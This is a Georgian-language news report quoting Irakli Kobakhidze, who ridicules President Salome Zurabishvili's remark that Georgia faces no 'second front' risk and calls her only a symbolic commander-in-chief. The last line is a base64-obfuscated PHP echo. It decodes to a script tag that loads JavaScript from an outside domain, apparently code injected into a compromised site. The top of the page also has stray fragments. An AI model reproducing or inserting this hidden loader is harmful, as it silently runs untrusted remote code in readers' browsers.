celsiusi
ავერსი შნაიდერი
ღიმილისმომგვრელია, როდესაც პრეზიდენტი ამბობს, რომ მეორე ფრონტის რისკი არ არსებობს, კიდევ კარგი, მართლა მთავარსარდალი არ არის, – განაცხადა ჟურნალისტებთან საუბრისას „ქართული ოცნების“ თავმჯდომარე ირაკლი კობახიძემ.
 
ირაკლი კობახიძემ აღნიშნა, რომ სალომე ზურაბიშვილი ფორმალური მთავარსარდალია.
 
„როდესაც პრეზიდენტი ამბობს, რომ მეორე ფრონტის რისკი არ არსებობს, არ ვიცი, ეს ღიმილისმომგვრელია; კიდევ კარგი, მართლა მთავარსარდალი არ არის სალომე ზურაბიშვილი. 40 კილომეტრში გვიყენია რუსეთის ჯარები, ორი რეგიონი წინა ხელისუფლების წყალობით არის ოკუპირებული, გადასცეს პირდაპირ რუსეთის ფედერაციას და ასეთ დროს სალომე ზურაბიშვილი რომ ამბობს, რომ მეორე ფრონტის რისკი არ არსებობს, არ ვიცი ახლა, რა კრიტიკას უძლებს ეს ყველაფერი. ფორმალური მთავარსარდალია, ხომ. მას არ შეუძლია სამხედრო ძალების მართვა კონსტიტუციის მიხედვით. კონსტიტუციაში წერია, რომ მშვიდობიან პერიოდში სამხედრო ძალებს მართავს თავდაცვის მინისტრი, ომის პერიოდში – პრემიერ-მინისტრი; აქედან გამომდინარე, პრეზიდენტი არის სიმბოლური მთავარსარდალი და არა ფაქტობრივი მთავარსარდალი, რაც კონსტიტუციაში წერია პირდაპირ. ეს არის საპარლამენტო რესპუბლიკებისთვის და მონარქიებისთვის დამახასიათებელი“, – განაცხადა ირაკლი კობახიძემ.
 
 
525
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");